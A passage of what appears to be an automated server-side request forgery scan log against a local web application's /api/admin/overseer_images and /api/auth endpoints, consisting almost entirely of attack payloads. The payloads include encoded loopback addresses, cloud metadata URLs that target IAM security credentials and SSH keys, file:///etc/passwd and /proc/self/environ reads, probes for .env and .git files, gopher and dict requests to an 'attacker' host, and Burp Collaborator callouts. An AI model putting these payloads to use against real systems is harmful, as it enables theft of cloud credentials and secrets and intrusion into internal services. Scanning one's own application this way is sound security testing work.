`http://localhost:4200/api/admin/overseer_images?url=localhost%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=2130706433%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235521%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235777%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/auth +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/auth?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/auth?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/auth?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/auth?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/auth?url=127.1%3A80` +- Testing: `http://localhost:4200/api/auth?url=0` +- Testing: `http://localhost:4200/api/auth?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A80` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/auth?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/auth?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/auth?url=127.127.127.127` +- Testing: `http://localhost:4200/api/auth?url=127.0.1.3` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.0` +- Testing: `http://localhost:4200/api/auth?url=2130706433` +- Testing: `http://localhost:4200/api/auth?url=017700000001` +- Testing: `http://localhost:4200/api/auth?url=0x7f000001` +- Testing: `http://localhost:4200/api/auth?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/auth?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/auth?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/auth?url=google.com.localhost` +- Testing: `http://localhost:4200/api/auth?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth?url=localtest.me` +- Testing: `http://localhost:4200/api/auth?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/auth?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/auth?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/auth?url=2130706433%2F` +- Testing: `http://localhost:4200/api/auth?url=3232235521%2F` +- Testing: `http://localhost:4200/api/auth?url=3232235777%2F` +- Testing: `http://localhost:4200/api/auth?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/auth?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/auth?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/auth?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/auth?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/auth?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth?url=0%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.1` +- Testing: `http://localhost:4200/api/auth?url=localtest.me` +- Testing: `http://localhost:4200/api/auth?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/auth?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/auth?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/auth?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/auth?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.0.1.3` +- Testing: `http://localhost:4200/api/auth?url=0` +- Testing: `http://localhost:4200/api/auth?url=127.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.1` +- Testing: `http://localhost:4200/api/auth?url=localhost` +- Testing: `http://localhost:4200/api/auth?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/auth?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/auth?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/auth?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/auth?url=7F000001` +- Testing: `http://localhost:4200/api/auth?url=2130706433` +- Testing: `http://localhost:4200/api/auth?url=6425673729` +- Testing: `http://localhost:4200/api/auth?url=127001` +- Testing: `http://localhost:4200/api/auth?url=127_0._0_1` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/auth?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/auth?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/auth?url=localtest.me` +- Testing: `http://localhost:4200/api/auth?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/auth?url=127.127.127.127` +- Testing: `http://localhost:4200/api/auth?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=0x7f000001` +- Testing: `http://localhost:4200/api/auth?url=017700000001` +- Testing: `http://localhost:4200/api/auth?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/auth?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/auth?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/auth?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/auth?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/auth?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/auth?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254` +- Testing: `http://localhost:4200/api/auth?url=2852039166` +- Testing: `http://localhost:4200/api/auth?url=7147006462` +- Testing: `http://localhost:4200/api/auth?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/auth?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/auth?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/auth?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/auth?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/auth?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/auth?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/auth?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/auth?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/auth?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/auth?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/auth?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/auth?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/auth?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/auth?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/auth?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/auth?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/auth?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/auth?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.0` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/auth?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/auth?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/auth?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/auth?url=3232235521` +- Testing: `http://localhost:4200/api/auth?url=3232235777` +- Testing: `http://localhost:4200/api/auth?url=425.510.425.510` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A80` +- Testing: 